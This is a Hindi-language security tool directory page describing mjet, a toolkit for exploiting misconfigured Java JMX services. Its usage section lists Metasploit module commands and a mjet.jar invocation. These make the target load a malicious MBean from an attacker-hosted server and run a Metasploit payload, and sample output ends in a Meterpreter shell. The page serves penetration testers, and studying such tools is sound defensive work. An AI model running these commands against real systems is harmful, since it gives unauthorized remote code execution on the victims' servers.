Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
mjet — Mogwai Java Management Extensions (JMX) शोषण टूलकिट | Kitploit
उपकरण/GitHubGitHub/mogwaisec/mjet
शोषण फ्रेमवर्कपेलोड जनरेशनशोषणपेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशनरेड टीमिंग
GitHubmogwaisec/mjet

mjet

Mogwai Java Management Extensions (JMX) शोषण टूलकिट

रिपॉजिटरी देखें
1743110 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

mjet

Mogwai सिक्योरिटी जावा मैनेजमेंट एक्सटेंशन (JMX) एक्सप्लॉइटेशन टूलकिट

mjet एक ऐसा टूल है जिसका उपयोग असुरक्षित रूप से कॉन्फ़िगर की गई JMX सेवाओं को सुरक्षित करने के लिए किया जा सकता है। यह ब्रैडन थॉमस/एक्यूवैंट "http://www.accuvant.com/blog/exploiting-jmx-rmi" के ब्लॉग पोस्ट "Exploiting JMX-RMI" पर आधारित है और इसका उपयोग लक्षित सिस्टम पर मनमाने Metasploit पेलोड को निष्पादित करने के लिए किया जा सकता है।

Mjet मूल रूप से एक पूर्ण आक्रमण टूलकिट होने की योजना बनाई गई थी, हालाँकि हमने देखा कि Metasploit Github रिपॉजिटरी में एक पुल रिक्वेस्ट है जो नेटिव रूबी में बेसिक जावा RMI/सीरियलाइज़ेशन सपोर्ट प्रदान करेगी। यह शानदार है और जावा निर्भरता को हटा देता है। इसलिए हमने इस टूल का विकास रोक दिया और निकट भविष्य में मेटास्प्लॉइट मॉड्यूल बनाएंगे।

mjet में निम्नलिखित भाग शामिल हैं:

  • एक मेटास्प्लॉइट मॉड्यूल जो "mlet सर्वर" का अनुकरण करता है। यह मूल रूप से एक वेब सर्वर है जो एक एचटीएमएल फ़ाइल होस्ट करता है जिसमें mlet टैग होता है
  • एक ManagedBean जिसे चयनित पेलोड को शामिल करने के लिए mlet सर्वर मॉड्यूल द्वारा बदला जाता है
  • एक जार संग्रह जिसका उपयोग असुरक्षित JMX सेवा से संपर्क करने के लिए किया जाता है।

स्थापना (Metasploit के github संस्करण के साथ)

  • "MBean" फ़ोल्डर को "data/java/metasploit" में कॉपी करें
  • java_mlet_server.rb को "modules/exploits/multi/misc/" में कॉपी करें

उपयोग

उदाहरण निम्नलिखित सिस्टम का उपयोग करता है: attacker: 192.168.178.1 target: 192.168.178.200, JMX सेवा tcp पोर्ट 1616 पर चल रही है

  • मेटास्प्लॉइट मॉड्यूल "java_mlet_server" कॉन्फ़िगर/प्रारंभ करें। मॉड्यूल एक बैकग्राउंड जॉब के रूप में चलेगा
root@kitploit:~
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run

कमजोर JMX सेवा से कनेक्ट करने के लिए mjet.jar का उपयोग करें और MLet वेब सर्वर का URL प्रदान करें...

root@kitploit:~
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164  5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done

और अपने मीटरप्रेटर शेल का आनंद लें :-)

टूल डाउनलोड करें